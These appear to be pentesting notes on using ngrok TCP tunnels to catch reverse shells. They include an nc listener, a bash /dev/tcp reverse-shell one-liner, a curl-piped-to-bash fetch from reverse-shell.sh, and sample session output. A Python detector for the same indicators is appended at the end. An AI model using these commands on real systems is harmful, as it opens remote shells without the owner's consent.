ngrok

Ngrok overview and setting up reverse shells

Overview

  • ngrok is a pretty sweet solution for a secure ingress gateway to your apps, services, and APIs. Check the docs for its use cases

  • With it, we can expose local networked services (like a TCP listener, SSH, or web server) to the public internet through a unique ngrok-generated URL

  • There are methods to build authentication or allowlisting around this, but they're not part of the free tier

Registration

  • After signing up for a free ngrok account, follow the setup instructions to get ngrok set up on your machine


Example - Reverse Shell

Ngrok and local listener setup

  • On your machine, start an ngrok TCP tunnel that forwards to the local port your listener will use (1337 here)

ngrok tcp 1337
  • This will provide you with a free forwarding address (you can also set up a custom domain)

ngrok

Policy Management Examples http://ngrok.com/apigwexamples

Session Status                online
Account                       cal (Plan: Free)
Version                       3.18.2
Region                        United States (California) (us-cal-1)
Web Interface                 http://127.0.0.1:4040
Forwarding                    tcp://2.tcp.us-cal-1.ngrok.io:11412 -> localhost:1337

Connections                   ttl     opn     rt1     rt5     p50     p90
                              0       0       0.00    0.00    0.00    0.00
  • You will also need something listening on the local port to catch the incoming connection; nc works for this like so:

nc -nvlp 1337

Reverse shell setup and execution

  • On a different machine, execute a reverse shell pointed at the ngrok forwarding address; ngrok relays the connection to the listener on your machine

  • Check out pentestmonkey and revshells for additional reverse shell options

bash -c 'bash -i >& /dev/tcp/2.tcp.us-cal-1.ngrok.io/11412 0>&1'
  • Tip - If you're running a bash reverse shell, make sure the current shell is bash, or you'll get an error like the one below (/dev/tcp is a bash redirection feature, not a real file on disk). Alternatively, invoke bash explicitly as in the command above; that works from any shell as long as bash is installed

zsh: no such file or directory: /dev/tcp/2.tcp.us-cal-1.ngrok.io/11412
  • Another option is reverse-shell.sh, which acts as a reverse shell as a service

  • You can open this URL directly in your browser to see the script that would be executed

curl https://reverse-shell.sh/2.tcp.us-cal-1.ngrok.io:11412 | bash
  • Once the shell has executed successfully, the session appears in your listener, e.g. nc. Note that nc reports the source as 127.0.0.1: the local ngrok agent is what hands the connection to port 1337, so the remote machine's address is not visible here

nc -nvlp 1337

listening on [any] 1337 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56240
bash: no job control in this shell

The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.

bash-3.2$ whoami
tyler

bash-3.2$ hostname
TylerMBP.local

bash-3.2$
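As an added example (not part of the original notes), a small Python detection that scans process command lines for the traces the commands above leave behind on the victim side: an ngrok TCP endpoint hostname, bash's /dev/tcp redirection, and a reverse-shell.sh fetch piped into a shell. The audit-line format ("pid user cmdline") and the sample lines are constructed for this example.

```python
import re

# Indicators taken from the commands on this page: an ngrok TCP tunnel endpoint
# (N.tcp.REGION.ngrok.io), bash's /dev/tcp/HOST/PORT redirection, and a
# reverse-shell.sh fetch piped into a shell. Because the tunnel terminates at
# ngrok, the destination a defender sees is the ngrok host, not the operator.
NGROK_HOST = re.compile(r"\b\d+\.tcp\.[a-z0-9-]+\.ngrok\.io\b")
DEV_TCP = re.compile(r"/dev/tcp/([^/\s]+)/(\d+)")
RSH_FETCH = re.compile(r"reverse-shell\.sh/([^\s|'\"]+)")
PIPE_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:ba)?sh\b")
DOWNLOADER = re.compile(r"\b(curl|wget)\b")


def classify(cmdline):
    """Return (labels, destination) for one process command line.
    destination is 'host:port' when one can be recovered, else None."""
    labels, dest = [], None
    m = DEV_TCP.search(cmdline)
    if m:
        labels.append("bash_dev_tcp_redirect")
        dest = f"{m.group(1)}:{m.group(2)}"
    m = RSH_FETCH.search(cmdline)
    if m:
        labels.append("reverse_shell_sh_fetch")
        dest = dest or m.group(1)
    if PIPE_SHELL.search(cmdline) and DOWNLOADER.search(cmdline):
        labels.append("download_piped_to_shell")
    if NGROK_HOST.search(cmdline):
        labels.append("ngrok_tcp_endpoint")
    return labels, dest


def scan(lines):
    """Parse constructed 'pid user cmdline' audit lines; return an alert per line that fires."""
    alerts = []
    for line in lines:
        pid, user, cmdline = line.split(maxsplit=2)
        labels, dest = classify(cmdline)
        if labels:
            alerts.append({"pid": int(pid), "user": user, "labels": labels, "dest": dest})
    return alerts


# Constructed sample: two benign processes plus the two commands shown on this page.
SAMPLE = [
    "4012 tyler /usr/bin/curl -sS https://example.org/health",
    "4015 tyler bash -c 'bash -i >& /dev/tcp/2.tcp.us-cal-1.ngrok.io/11412 0>&1'",
    "4020 tyler bash -c 'curl https://reverse-shell.sh/2.tcp.us-cal-1.ngrok.io:11412 | bash'",
    "4031 root /usr/sbin/sshd -D",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```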